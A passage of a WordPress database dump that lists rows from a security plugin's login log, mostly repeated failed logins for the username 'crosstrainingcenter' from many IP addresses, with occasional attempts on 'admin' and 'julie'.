(103869, 1500064276.647239, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2535351384, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103870, 1500064278.250968, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2535351384, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103871, 1500064710.802176, 1, 'loginFailInvalidUsername', 'wpupdatestream', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.13.66 (KHTML, like Gecko) Version/4.6.2 Safari/533.21'),
(103872, 1500069328.095825, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1532173984, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103873, 1500069329.179933, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1532173984, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103874, 1500073516.026842, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1376975531, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103875, 1500073872.840681, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 90998243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103876, 1500073876.484860, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 90998243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103877, 1500075515.098570, 1, 'loginFailValidUsername', 'julie', 2, 918495289, ''),
(103878, 1500081797.192663, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1128575345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103879, 1500081798.473424, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1128575345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103880, 1500082460.791539, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3151272036, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103881, 1500082462.062722, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3151272036, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103882, 1500087266.709797, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3141400205, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103883, 1500087688.250323, 1, 'loginFailValidUsername', 'julie', 2, 585330554, ''),
(103884, 1500094419.789115, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1293927825, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103885, 1500095028.556081, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1978994662, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103886, 1500095030.114926, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1978994662, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103887, 1500095941.978886, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835573799, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103888, 1500097075.895449, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1088887350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103889, 1500097077.304861, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1088887350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103890, 1500099925.360026, 1, 'loginFailValidUsername', 'julie', 2, 873965049, ''),
(103891, 1500100688.885545, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 780580991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103892, 1500100690.234245, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 780580991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103893, 1500101032.043736, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2036559243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103894, 1500101034.876032, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2036559243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103895, 1500101309.003343, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982752697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103896, 1500101310.468264, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982752697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103897, 1500106175.543879, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976044991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103898, 1500106398.508892, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1297608708, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103899, 1500108795.336120, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2868764100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103900, 1500108796.532931, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2868764100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103901, 1500109862.683272, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1571919792, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103902, 1500109863.903920, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1571919792, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103903, 1500110263.072129, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1051243338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103904, 1500110264.126579, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1051243338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103905, 1500112968.732547, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/534.04.51 (KHTML, like Gecko) Chrome/57.4.9288.4016 Safari/534.34'),
(103906, 1500113422.661445, 1, 'loginFailValidUsername', 'julie', 2, 874893407, ''),
(103907, 1500116185.106257, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1490298005, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103908, 1500116186.498594, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1490298005, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103909, 1500116322.444641, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1415292827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103910, 1500116323.538698, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1415292827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103911, 1500116450.637608, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 979684014, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103912, 1500116452.417734, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 979684014, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103913, 1500117519.333100, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1014463215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103914, 1500117520.723017, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1014463215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103915, 1500117598.093221, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1498204623, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103916, 1500117599.068753, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1498204623, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103917, 1500120564.020069, 1, 'loginFailInvalidUsername', 'test', 0, 1549060274, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103918, 1500120565.634492, 1, 'loginFailInvalidUsername', 'test', 0, 1549060274, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103919, 1500122101.820133, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/532.97.40 (KHTML, like Gecko) Chrome/57.5.0916.5289 Safari/534.68 OPR/40.6.1739.6001'),
(103920, 1500125299.193256, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946419000, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103921, 1500125300.987825, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946419000, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103922, 1500126459.018772, 1, 'loginFailValidUsername', 'julie', 2, 874893407, ''),
(103923, 1500126598.100066, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631171529, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103924, 1500126599.325959, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631171529, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103925, 1500126691.250475, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1523870519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103926, 1500126692.380102, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1523870519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103927, 1500128564.455619, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1342974510, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103928, 1500128565.546818, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1342974510, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103929, 1500128873.766067, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1336393587, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103930, 1500128874.797578, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1336393587, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103931, 1500129319.351097, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(103932, 1500129400.487867, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3399919026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103933, 1500129401.718138, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3399919026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103934, 1500130054.315140, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1604693571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103935, 1500130055.347418, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1604693571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103936, 1500131718.339090, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2374503378, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103937, 1500131719.823474, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2374503378, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103938, 1500132537.932821, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3013207725, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103939, 1500132539.351440, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3013207725, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103940, 1500133388.506148, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 779452982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103941, 1500133389.579675, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 779452982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103942, 1500135872.677504, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991933812, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103943, 1500135873.635865, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991933812, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103944, 1500138276.636488, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3318663778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103945, 1500138277.714137, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3318663778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103946, 1500139102.892760, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781789324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103947, 1500139104.090382, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781789324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103948, 1500139262.370981, 1, 'loginFailValidUsername', 'julie', 2, 583622267, ''),
(103949, 1500139376.709619, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657224322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103950, 1500139378.022341, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657224322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103951, 1500141267.615833, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976112628, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103952, 1500141269.573778, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976112628, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103953, 1500148559.033181, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549272919, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103954, 1500148559.966116, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549272919, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103955, 1500152033.128133, 1, 'loginFailValidUsername', 'julie', 2, 585291184, ''),
(103956, 1500152099.120061, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2332422595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103957, 1500152100.453065, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2332422595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103958, 1500155684.035939, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3583325039, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(103959, 1500155685.015337, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3583325039, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103960, 1500156831.897880, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2588110632, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103961, 1500156833.557576, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2588110632, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103962, 1500160451.810948, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3319954936, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103963, 1500162630.737601, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050341734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103964, 1500162632.671532, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050341734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103965, 1500163898.429086, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.84.37 (KHTML, like Gecko) Chrome/56.3.9658.4820 Safari/534.44 OPR/44.5.0371.5643'),
(103966, 1500164749.416714, 1, 'loginFailValidUsername', 'julie', 2, 911901410, ''),
(103967, 1500169905.168435, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3042655538, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103968, 1500172135.996149, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982214495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103969, 1500172137.896213, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982214495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103970, 1500178801.069251, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3361094801, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103971, 1500178945.387394, 1, 'loginFailValidUsername', 'julie', 2, 919161641, ''),
(103972, 1500181716.193208, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1678835878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103973, 1500185547.203253, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1744517895, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103974, 1500186715.732462, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1729003577, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103975, 1500186718.451057, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1729003577, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103976, 1500187179.472530, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2315261990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103977, 1500187181.368764, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2315261990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103978, 1500188687.211665, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1034942322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103979, 1500188694.698008, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1034942322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103980, 1500188764.069600, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 984866374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103981, 1500188765.917135, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 984866374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103982, 1500190406.672923, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1743437059, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103983, 1500190412.138099, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1743437059, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103984, 1500190916.134994, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1384349292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103985, 1500190917.260868, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1384349292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103986, 1500191396.971041, 1, 'loginFailValidUsername', 'julie', 2, 585452219, ''),
(103987, 1500191771.619910, 0, 'loginOK', 'admin', 1, 1055643623, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(103988, 1500193614.146648, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2003317331, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103989, 1500193615.677783, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2003317331, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103990, 1500193622.649635, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 996543394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103991, 1500193624.323538, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 996543394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103992, 1500194737.638314, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3142477053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103993, 1500194739.030226, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3142477053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103994, 1500198415.044433, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694932233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103995, 1500198416.086320, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694932233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103996, 1500199810.621905, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.91.48 (KHTML, like Gecko) Version/5.3.8 Safari/531.83'),
(103997, 1500201345.331940, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3584181319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103998, 1500201346.463857, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3584181319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103999, 1500201479.880134, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1959709504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104000, 1500201481.191712, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1959709504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104001, 1500201483.773891, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 36836099, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104002, 1500201484.970189, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 36836099, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104003, 1500202626.470749, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 773628453, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104004, 1500202627.549179, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 773628453, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104005, 1500202927.335076, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3039364422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104006, 1500202928.633160, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3039364422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104007, 1500203411.808693, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1517002773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104008, 1500203412.714421, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1517002773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104009, 1500204825.940172, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2015196442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104010, 1500204827.473511, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2015196442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104011, 1500205557.827509, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835616125, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104012, 1500205559.094682, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835616125, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104013, 1500205955.644608, 1, 'loginFailValidUsername', 'julie', 2, 585452219, ''),
(104014, 1500207963.394842, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887846670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
